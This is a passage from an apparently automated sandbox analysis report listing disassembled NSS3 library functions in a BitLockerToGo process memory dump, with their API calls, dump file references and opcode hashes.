                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 759476665-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 85eb2a286b73e3d9f9df6eeac8a14103e342610393400f40e0b0b7db901f2714
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 92c9828f80e41ff2b136c1b1f75bcd9189ed2752d53afc94b43f1cf6aeedd9da
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85eb2a286b73e3d9f9df6eeac8a14103e342610393400f40e0b0b7db901f2714
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 214104B06043056BE714CF69C881BBB73E8AF85758F60052CEA5587741F7B0D924CB5A
                                                                                                                                                                                                                                                                                                                                                          Function 6C66CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000060), ref: 6C66CF80
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C66D002
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C66D016
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C66D025
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C66D043
                                                                                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C66D074
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3361105336-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 995dac1b82b0721b28bf113a77d3820c2325b1f2d5eff3236a9f9530821529fa
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 047e8bd1eecc83f6733b185f4e72f5e7fd89bf2203e7b5828e468542134777e3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 995dac1b82b0721b28bf113a77d3820c2325b1f2d5eff3236a9f9530821529fa
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2141BFB0A012119FDB10DF2AC88479A7BE4EF09358F21416ADC198FF46D774D885CBAA
                                                                                                                                                                                                                                                                                                                                                          Function 6C652E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C642D1A), ref: 6C652E7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C648298,?,?,?,6C63FCE5,?), ref: 6C6A07BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6A07E6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A081B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A0825
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C652EDF
                                                                                                                                                                                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C652EE9
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C642D1A), ref: 6C652F01
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C642D1A), ref: 6C652F50
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C652F81
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 287051776-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5cfa4a63010f718305869c9a631d23e0c51f8e30e8ca6cf53ea3861173442be9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 483123716411008BE710C655FC4CBAFB365EF81318FB48979D42A97AD0EB3298AAC65E
                                                                                                                                                                                                                                                                                                                                                          Function 6C640E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CERT_DecodeAVAValue.NSS3(?,?,6C640A2C), ref: 6C640E0F
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C640A2C), ref: 6C640E73
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C640A2C), ref: 6C640E85
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C640A2C), ref: 6C640E90
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C640EC4
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C640A2C), ref: 6C640ED9
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3618544408-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dc49d566ad79ce615f242cd032a4065bb98a2c839da053602be397d26c3e1e3b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 547cac12dbf2fb5f50c08e998523a475e7c1bb2a65af08f67c9e1470bfc85ff0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc49d566ad79ce615f242cd032a4065bb98a2c839da053602be397d26c3e1e3b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9216177E002A597EB0049765C45FA772AEDFE270DF05C435D81853601EB61C83782AA
                                                                                                                                                                                                                                                                                                                                                          Function 6C6588D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C660725,00000000,00000058), ref: 6C658906
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C65891A
                                                                                                                                                                                                                                                                                                                                                          • PL_ArenaAllocate.NSS3(?,?), ref: 6C65894A
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,6C66072D,00000000,00000000,00000000,?,6C660725,00000000,00000058), ref: 6C658959
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C658993
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C6589AF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1716546843-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 591ddf0274d7d4330cb602099eed4c299205deff0923aafe27bffe6a8e9e0936
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 007ab7edd152eb4b974ee3845718a39e9547b32540a24958469df05ec4e2c892
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 591ddf0274d7d4330cb602099eed4c299205deff0923aafe27bffe6a8e9e0936
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 193125B2E50115ABD7008F2CCC40A9AB7A8EF4A31DF648526EC18D7B51E731E865C7DA
                                                                                                                                                                                                                                                                                                                                                          Function 6C64AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C64AEB3
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C64AECA
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C64AEDD
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C64AF02
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C769500), ref: 6C64AF23
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C69F0C8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C69F122
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C64AF37
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3714604333-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d61ae97812afc3fb0e1d05dfafb8a3e7e74b2a74c37ccccb6229be5c3c782fff
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 20de1be9a2f0e1e7b65b86d7c764d72a229a75432279595b79cb5eb464abe50e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d61ae97812afc3fb0e1d05dfafb8a3e7e74b2a74c37ccccb6229be5c3c782fff
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F21FBB15092007BE7108E589C41B9A7BA4AF85728F14C325FC649B7D2E731D94587AF
                                                                                                                                                                                                                                                                                                                                                          Function 6C6CEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6CEE85
                                                                                                                                                                                                                                                                                                                                                          • realloc.MOZGLUE(BD5F5530,?), ref: 6C6CEEAE
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C6CEEC5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(?), ref: 6C6CEEE3
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(00000000,?), ref: 6C6CEEED
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C6CEF01
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1351805024-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f9faed1239fb04f8fae1e715f37a8c803519ce3ce00e758b32f0cd783ad2f8a6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9aae73115de44d75d6e311a92de3546c582f15a345954fe3a99cc3881ec8c3ab
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9faed1239fb04f8fae1e715f37a8c803519ce3ce00e758b32f0cd783ad2f8a6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E21D171A002149FCB109F28DC85B9ABBB4EF49398F148179EC199B641E730ED15CBEA
                                                                                                                                                                                                                                                                                                                                                          Function 6C694820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C694EB8,?), ref: 6C694884
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,6C6A085A,00000000,?,6C648369,?), ref: 6C698821
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C69883D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: EnterCriticalSection.KERNEL32(?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698856
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C698887
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_Unlock.NSS3(?,?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698899
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C694EB8,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C69484C
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C694EB8,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C69486D
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694899
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6948A9
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6948B8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2226052791-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b2719e5061ae4760a570a45aecf6551c9f0b552ede21f8508b56ab8a73578c88
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ca48780c1060862f6253c6f6360cafa91c914cffd705929b4e07b53e7198a53d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2719e5061ae4760a570a45aecf6551c9f0b552ede21f8508b56ab8a73578c88
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09210B72F042419BEF005EA5EE8457677B8FF0B359B040535DE2987B11EB61E814C7A5
                                                                                                                                                                                                                                                                                                                                                          Function 6C6D3C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C6D5B56
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6D3D3F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64BA90: PORT_NewArena_Util.NSS3(00000800,6C6D3CAF,?), ref: 6C64BABF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C6D3CAF,?), ref: 6C64BAD5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C6D3CAF,?), ref: 6C64BB08
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C6D3CAF,?), ref: 6C64BB1A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C6D3CAF,?), ref: 6C64BB3B
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D3CCB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090C9
